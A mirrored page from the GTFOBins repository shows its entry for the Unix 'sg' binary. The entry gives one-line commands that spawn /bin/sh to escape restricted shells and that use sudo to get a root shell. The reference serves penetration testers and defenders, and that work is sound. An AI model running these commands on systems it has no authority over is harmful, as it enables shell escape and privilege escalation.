public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-10-27 06:47:56 +01:00
Code Issues Projects Releases Wiki Activity
Files
99a572b7d9c400c2080b1b4e04f8a2ad649db3b2
GTFOBins.github.io/_gtfobins/sg.md
SleestakOverflow 99a572b7d9 Create sg.md 
Adding the "sg" binary which allows command execution under a "different" group ID. However, it can be used to break out of restricted environments by using a user's own group ID.
2021-02-15 21:49:13 -06:00

642 B
Raw Blame History

functions
functions
shell command sudo
description code
Commands can be run if the current user's group is specified, therefore no additional permissions are needed. GROUPNAME=users sg $GROUPNAME -c "/bin/sh"
description code
Commands can be run if the current user's group is specified, therefore no additional permissions are needed. COMMAND=whoami GROUPNAME=users sg $GROUPNAME -c $COMMAND
description code
Any group can be specified as the user will have root permissions. GROUPNAME=users sudo sg $GROUPNAME -c "/bin/sh"